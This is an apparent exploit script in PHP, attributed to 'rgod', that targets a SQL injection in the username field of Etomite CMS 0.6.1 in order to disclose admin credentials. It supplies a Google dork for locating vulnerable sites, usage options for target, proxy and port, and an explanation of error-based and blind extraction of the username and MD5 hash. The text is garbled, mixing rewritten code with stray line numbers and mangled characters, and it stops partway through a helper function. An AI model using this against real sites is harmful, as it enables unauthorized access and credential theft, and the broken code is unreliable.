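#!/usr/bin/php -q -d short_open_tag=on
<?php
// Long-form open tag: parses regardless of the short_open_tag ini setting, so the
// -d directive on the shebang line is now redundant (kept; it is harmless).
// The shebang options are ASCII hyphens (-q, -d): the CLI option parser does not
// recognise the U+2212 minus sign the rendered copy carried.
//
// Banner: four lines, each terminated by CRLF, followed by one blank line.
echo implode("\r\n", [
    "Etomite CMS <= 0.6.1 (all patches applied) ’username’ SQL injection / admin credentials disclosure",
    "by rgod rgod@autistici.org",
    "site: http://retrogod.altervista.org",
    "google dork: \"Content managed by the Etomite Content Management System\"",
]), "\r\n\r\n";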
7
8 /*
9 works with magic_quotes_gpc=Off
10 */
11
// Argument check: host and path are mandatory; with fewer than two positional
// arguments print the usage text (CRLF line endings) and stop.
if ($argc < 3) {
    $self = $argv[0];
    $usage = [
        "Usage: php {$self} host path OPTIONS",
        "host: target server (ip/hostname)",
        "path: path to etomite",
        "Options:",
        " −T[prefix]: specify a table prefix (default: etomite_)",
        " −p[port]: specify a port other than 80",
        " −P[ip:port]: specify a proxy",
        "Examples:",
        "php {$self} localhost /etomite/ ",
        "php {$self} localhost / −P1.1.1.1:80",
    ];
    echo implode("\r\n", $usage), "\r\n";
    exit;
}
25 /*
26 software site: http://www.etomite.org/
27
28 explanation:
29
30 goto http://[target]/[path_to_etomite]/manager/index.php
31
32 and, if magic_quotes_gpc=Off, there is SQL injection in the 'username' argument
33
34 you *could* bypass the login check with a well-crafted 'UNION SELECT', but the
35 following 'REPLACE INTO' query will fail.
36 Through the error message you can disclose database name and table prefix
37 that will be useful to go on with a new attack, asking true/false questions
38 to the database to disclose the username/md5 hash pair...
39
40 */
// Runtime configuration for the rest of the script.
// error_reporting(0) turns off all PHP diagnostics, so later failures (e.g. a
// refused socket connect) produce no warning output of their own.
error_reporting(0);
// max_execution_time 0: no script time limit.
// default_socket_timeout 5: socket streams opened later wait at most 5 seconds.
foreach (['max_execution_time' => '0', 'default_socket_timeout' => '5'] as $iniDirective => $iniValue) {
    ini_set($iniDirective, $iniValue);
}
44
45 function quick_dump($string)
46 {
47 $result=’’;$exa=’’;$cont=0;
48 for ($i=0; $i<=strlen($string)−1; $i++)
49 {
50 if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
51 {$result.=" .";}
52 else
53 {$result.=" ".$string[$i];}
54 if (strlen(dechex(ord($string[$i])))==2)
55 {$exa.=" ".dechex(ord($string[$i]));}
56 else
57 {$exa.=" 0".dechex(ord($s